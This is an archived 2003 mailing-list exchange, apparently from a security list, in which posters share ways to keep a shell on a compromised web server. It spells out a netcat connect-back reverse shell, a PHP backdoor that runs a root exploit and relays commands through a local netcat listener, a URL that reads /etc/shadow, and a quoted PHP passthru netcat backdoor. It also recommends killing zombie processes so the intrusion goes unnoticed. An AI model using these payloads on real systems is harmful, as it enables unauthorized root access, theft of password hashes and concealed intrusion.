Hi,
I've been using this technique for a while. If you
can upload a php or a perl file which gets executed in
the server context you already won, regardless of
firewall rules. The obvious method is the connect
back(i.e nc -e /bin/sh x.x.x.x 80 as that's the
likelly allowed outbound port). If that's a no go,
and there's absolutelly no way to estabilish a
session, you still win.
Consider this:
<?
`exploit which gets root and calls nc -e /bin/sh -l
-p 9999`
?>
then another script:
<?
$z = `echo $x | nc localhost 999`;
$z=str_replace("\n", "<br>", $z);
echo $z;
?>
As is obvious, call the second script and you have
somehwat of a crippled root shell.
www.target.com/script2.php?x=cat /etc/shadow
you get the point :P
PS: the silly thing about this is that each command
you execute this way ends up as a zombie process.
In a few minutes of working with this "shell" you'll
have hundreds of zombie processes on the target
machine. What i like to do is run zkill (zkill.c
google it) slightly modified to terminate all zombies.
This way it's less obvious that something very odd is
going on.
--- Knud_Erik_Højgaard <kainat_private> wrote:
> Ingram wrote:
> [snip]
> > i got right know is uid www. I think a
> connect-back perl/php code
> > could made it through this packtfilter, as the
> outbound rules could
> > be less tight.
> >
> > Anyone aware of a backdoor like this?
> netcat:
> <? passthru("nc -e /bin/sh ip port"); ?>
>
> or a cronjob doing the same..
>
> --
> kokanin
__________________________________
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
http://sitebuilder.yahoo.com
This archive was generated by hypermail 2b30 : Wed Jul 30 2003 - 12:28:38 PDT